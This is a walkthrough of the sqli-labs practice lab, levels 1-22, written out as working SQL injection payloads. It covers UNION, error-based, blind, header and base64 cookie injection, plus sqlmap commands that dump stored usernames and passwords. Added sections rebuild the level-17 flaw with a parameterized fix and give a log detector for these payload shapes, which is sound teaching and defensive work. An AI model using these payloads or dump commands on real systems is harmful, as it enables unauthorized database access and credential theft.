sqli-labs basic levels (1-22)
Injection approach
- Output is echoed back: UNION query injection
- No echo:
  - Errors are displayed: error-based injection
  - No errors displayed: time-based blind or boolean-based blind injection
less-1 GET - Error based - Single quotes - String
Method 1: UNION query injection
Entering a single quote makes the page throw an error, and from the error message we can tell the parameter is closed with a single quote. Without further ado, go straight to dumping the database.
Dump the database name
?id=-1' union select 1,database(),3--+
Dump the tables
?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3--+
Dump the columns
?id=-1' union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name="users"),3--+
Dump the data
?id=-1' union select 1,(select group_concat(username,0x3a,password)from users),3--+
Method 2: error-based injection
extractvalue() is a function that queries an XML document.
Syntax: extractvalue(target XML document, XPath). The second parameter, the XPath location, is the place we can manipulate: a location inside the XML document is written in the form /xxx/xxx/xxx/…, and if we supply something in any other format the function raises an error whose message echoes back the invalid content we supplied.
One thing to note: the string extractvalue() shows in its error is at most 32 characters long, so if the result we want is longer than 32 characters we have to slice it with substring() and read it 32 characters at a time.
updatexml() is similar to extractvalue(); it is the function that updates an XML document.
Syntax: updatexml(target XML document, XPath, new content)
Note: the string updatexml() can expose is likewise limited to 32 characters.
Dump the database name
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
Dump the tables
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,32)),0x7e))--+
Dump the columns
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name="users"),1,32)),0x7e))--+
Dump the data
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(username,0x3a,password)from users),1,32)),0x7e))--+
Move the substring offset forward and repeat to read the data 32 characters at a time.
updatexml() works like extractvalue(): put the query in the second parameter.
less-2 GET - Error based - Intiger based
In level 2 the id is an integer; everything else is the same as level 1.
less-3 GET - Error based - Single quotes with twist -string
Closed with a single quote plus a parenthesis.
less-4 GET - Error based - Double Quotes - String
Closed with a double quote plus a parenthesis.
less-5 GET - Double Injection - Single Quotes -String
Entering ?id=1 shows "You are in…"; adding a single quote produces an error, so go straight to the error-based functions.
Dump the database name
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
Dump the tables
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,32)),0x7e))--+
Dump the columns
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name="users"),1,32)),0x7e))--+
Dump the data
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(username,0x3a,password)from users),1,32)),0x7e))--+
less-6 GET - Double Injection - Double Quotes -String
Closed with a double quote.
less-8 GET - Blind - Boolian Based - Single Quotes
As the name says, this is boolean-based blind injection.
PS: for blind injection I strongly recommend a script or sqlmap, otherwise it will wear you out!!!
First guess the length of the database name
?id=1' and length(database())=1--+
?id=1' and length(database())=2--+
?id=1' and length(database())=3--+
?id=1' and length(database())=4--+
?id=1' and length(database())=5--+
?id=1' and length(database())=6--+
?id=1' and length(database())=7--+
?id=1' and length(database())=8--+
On the eighth request the page displays normally, so the database name is 8 characters long.
Once we have the length, start extracting the database name
substring(string to slice, start, length)
Using binary search greatly speeds this up
?id=1' and substring(database(),1,1)>"m"--+
The page displays normally, so the first character of the database name is > 'm'; continue with binary search and the first character turns out to be 's'.
Dump the table names
?id=1' and substring((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1)="e"--+
Dump the column names
?id=1' and substring((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name="users"),1,1)="i"--+
Dump the data
?id=1' and substring((select group_concat(username) from users),1,1)='d'--+
less-9 GET - Blind - Time based. - Single Quotes
Whatever we enter, the page looks the same, so use time-based blind injection.
Database name length
?id=1' and if(length(database())=8,sleep(3),0)--+
less-10 GET - Blind - Time based - double quotes
Closed with a double quote; otherwise the same as level 9.
less-11 POST - Error Based - Single quotes- String
POST-based injection; use Burp Suite to capture the request.
less-12 POST - Error Based - Double quotes- String
Closed with a double quote plus a parenthesis.
less-13 POST - Double Injection - Single quotes-String -with -twist
Closed with a single quote plus a parenthesis.
less-14 POST - Double Injection - Single quotes-String -with -twist
Closed with a double quote.
less-15 POST - Blind- Boolian/time Based - Single quotes
POST blind injection
When you run into blind injection, go straight to sqlmap.
Common sqlmap options
--current-db    # current database
--current-user  # current user
--dbs           # list all databases
-D              # select a database
--tables        # list all tables
-T              # select a table
--columns       # list all columns
--dump          # dump the table's rows
--tamper        # load a tamper script
Dump the database name
sqlmap -r /root/less-15.txt --batch --current-db   # --current-db: current database
Dump the tables
sqlmap -r /root/less-15.txt --batch -D security --tables --threads 10
Dump the data
sqlmap -r /root/less-15.txt --batch -D security -T users --dump --threads 10
less-16 POST - Blind- Boolian/Time Based - Double quotes
POST blind injection, closed with a double quote plus a parenthesis; otherwise the same as level 15.
less-17 POST - Update Query- Error Based - String
Looking at the source code, uname is filtered through check_input(), so we can only inject through the password field.
function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}
get_magic_quotes_gpc — gets the current magic_quotes_gpc configuration setting
When magic_quotes_gpc is on, every ' (single quote), " (double quote), \ (backslash) and NUL character is automatically escaped with a backslash.
stripslashes() returns the string with the escaping backslashes removed (\' becomes ', and so on). A double backslash (\\) becomes a single backslash (\).
mysql_real_escape_string — escapes the special characters in a string for use in an SQL statement, taking the connection's current character set into account
ctype_digit() checks whether a string consists only of digits: it returns true if so and false otherwise.
The function first checks whether the value is empty, then whether the global magic quotes switch is on; if it is, it enters the second if and uses stripslashes() to remove the escape characters. It then checks whether the value is a number; if not, it enters the third if and uses mysql_real_escape_string() to escape the special characters, which are: \x00, \n, \r, \, ', " and \x1a.
Level 17 mainly tests group by error-based injection (the floor(rand(0)*2) duplicate-key trick).
Data-dumping payload
1' and (select 1 from (select count(*),concat((select concat(username,0x3a,password) from security.users limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x) a)#
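The level-17 defect, re-created here as an added Python/sqlite3 example (not the lab's code or the post author's): check_input() is a simplified stand-in for the PHP function above (truncate to 15, quote, escape; sqlite quote-doubling replaces mysql_real_escape_string), the users rows are constructed, and the contrast is that escaping only one field leaves the other one able to reach the SQL parser, while the bound-parameter form needs neither escaping nor truncation.

```python
import sqlite3

# Added example, not part of sqli-labs: the level-17 pattern rebuilt on
# sqlite3. check_input() mirrors the lab's PHP helper; the hardened form
# binds both values as parameters. Sample rows below are constructed.

def check_input(value: str) -> str:
    """Mimic the lab's check_input(): truncate to 15 characters, then quote and
    escape unless the value is all digits (sqlite doubles quotes instead of
    backslash-escaping, so this stands in for mysql_real_escape_string)."""
    value = value[:15]
    if value.isdigit():
        return str(int(value))
    return "'" + value.replace("'", "''") + "'"

def make_db() -> sqlite3.Connection:
    """Constructed sample rows; the last username is 20 characters long."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "Dumb", "Dumb"), (2, "admin", "admin"), (3, "averylongusername123", "x")])
    return con

def update_vulnerable(con, uname: str, passwd: str) -> int:
    """Level-17 shape: uname goes through check_input() but passwd is
    concatenated raw, so any quote in it reaches the SQL parser."""
    sql = f"UPDATE users SET password='{passwd}' WHERE username={check_input(uname)}"
    return con.execute(sql).rowcount

def update_safe(con, uname: str, passwd: str) -> int:
    """Hardened form: both values are bound parameters, so no escaping or
    truncation is needed and the inputs can never alter the statement."""
    return con.execute("UPDATE users SET password=? WHERE username=?",
                       (passwd, uname)).rowcount

def vulnerable_breaks(con, uname: str, passwd: str) -> bool:
    """True if the concatenated statement fails to parse for this input: that
    parser error is what error-based injection (levels 1-7, 17) reads back."""
    try:
        update_vulnerable(con, uname, passwd)
        return False
    except sqlite3.OperationalError:
        return True

def password_of(con, uname: str):
    row = con.execute("SELECT password FROM users WHERE username=?", (uname,)).fetchone()
    return row[0] if row else None
```

Note that the sanitizer also damages legitimate input: a 20-character username is silently cut to 15 and the vulnerable update matches no row, while the parameterized one updates it.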
less-18 POST - Header Injection - Uagent field -Error based
User-Agent injection
1' and extractvalue(1,concat(0x7e,(substring((select group_concat(username,0x3a,password)from users),1,32)),0x7e)) and '1'='1
less-19 POST - Header Injection - Referer field -Error based
Referer injection; same method as level 18.
less-20 POST - Cookie injections - Uagent field -Error based
Cookie injection; same method as level 18.
less-21 Cookie injection- base64 encoded-single quotes and parenthesis
After a successful login the server returns a base64-encoded cookie, so we guess this is cookie injection (base64-encoded).
Decoding YWRtaW4= from base64 gives admin, which confirms base64-encoded cookie injection.
Payload before encoding
admin') and extractvalue(1,concat(0x7e,(substring((select group_concat(username,0x3a,password)from users),1,32)),0x7e))--+
base64 encoding script; there are also plenty of ready-made tools online.
import base64
# the payload from above, split over two lines (closed with # instead of --+)
payload = "admin') and extractvalue(1,concat(0x7e,(substring((select group_concat" \
"(username,0x3a,password)from users),1,32)),0x7e))#"
# UTF-8 bytes -> base64 bytes -> str, ready to be set as the cookie value
a = base64.b64encode(payload.encode('utf-8')).decode("utf-8")
print(a)
Encoded payload
YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwweDNhLHBhc3N3b3JkKWZyb20gdXNlcnMpLDEsMzIpKSwweDdlKSkj
less-22 Cookie Injection - base64 encoded - double quotes
Base64 cookie injection, closed with a double quote; same method as level 21.
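Seen from the defending side, every level above leaves a recognisable shape in the request: the UNION and extractvalue/updatexml/floor(rand()) payloads of levels 1-7 and 17, the substring/length comparisons and sleep() calls of the blind levels 8-10 and 15-16, and, for levels 18-22, the same strings carried in User-Agent, Referer or a base64-encoded cookie. The detector below is an added example (not from the original post or sqli-labs): the log format, field names and sample lines are constructed, the only page value reused is the encoded cookie from level 21, and it decodes base64 cookie values before matching and counts blind-style probes per client.

```python
import re, base64, binascii
from urllib.parse import unquote_plus
# Added detector (not from the original post) for the payload shapes this
# walkthrough uses. The log format "ip | method | path | user-agent | referer
# | cookie" and the sample lines below are constructed for the example.
SIGNATURES = {
    "union": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I),
    "error_xml": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "error_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "time_blind": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    # substring/length of a value followed by a comparison: the level 8-10 probe shape
    "bool_blind": re.compile(r"\b(substring|substr|mid|ascii|length)\s*\(.*?\)\s*(=|<|>|!=|like)", re.I),
}
BLIND_THRESHOLD = 2  # probes from one client before it counts as enumeration

def decode_cookie_values(cookie: str) -> str:
    """Levels 21/22 carry the payload base64-encoded in a cookie value; return
    the raw cookie plus the decoded form of every value that is valid base64."""
    decoded = []
    for kv in cookie.split(";"):
        value = kv.split("=", 1)[-1].strip()
        try:
            decoded.append(base64.b64decode(value, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            pass
    return " ".join([cookie] + decoded)

def classify(line: str):
    """Return (ip, sorted signature names) for one line. Query string, User-Agent,
    Referer and Cookie are all checked because levels 18-22 inject via headers."""
    ip, _method, path, ua, referer, cookie = [f.strip() for f in line.split("|")]
    haystack = " ".join([unquote_plus(path), ua, referer, decode_cookie_values(cookie)])
    return ip, sorted(n for n, rx in SIGNATURES.items() if rx.search(haystack))

def scan(lines) -> dict:
    """Per-client report: signatures seen, blind-probe count, enumeration flag."""
    report = {}
    for line in lines:
        ip, hits = classify(line)
        entry = report.setdefault(ip, {"signatures": set(), "blind_probes": 0})
        entry["signatures"].update(hits)
        entry["blind_probes"] += int(bool({"bool_blind", "time_blind"} & set(hits)))
    for entry in report.values():
        entry["enumeration"] = entry["blind_probes"] >= BLIND_THRESHOLD
    return report

SAMPLE_LOG = [  # constructed lines; the base64 cookie is the encoded payload from level 21
    "10.0.0.5 | GET | /Less-1/?id=-1%27%20union%20select%201,database(),3--+ | Mozilla | - | -",
    "10.0.0.5 | GET | /Less-8/?id=1%27%20and%20substring(database(),1,1)%3E%22m%22--+ | Mozilla | - | -",
    "10.0.0.5 | GET | /Less-8/?id=1%27%20and%20substring(database(),1,1)%3E%22s%22--+ | Mozilla | - | -",
    "10.0.0.9 | POST | /Less-18/ | 1' and extractvalue(1,concat(0x7e,database(),0x7e)) and '1'='1 | - | -",
    "10.0.0.9 | POST | /Less-21/ | Mozilla | - | uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwweDNhLHBhc3N3b3JkKWZyb20gdXNlcnMpLDEsMzIpKSwweDdlKSkj",
    "10.0.0.7 | GET | /Less-1/?id=1 | Mozilla | - | uname=YWRtaW4=",
]
```

Running scan(SAMPLE_LOG) flags 10.0.0.5 for a UNION payload plus two boolean probes (enumeration), 10.0.0.9 for extractvalue() in both a header and a decoded cookie, and nothing for 10.0.0.7, whose cookie decodes to plain admin.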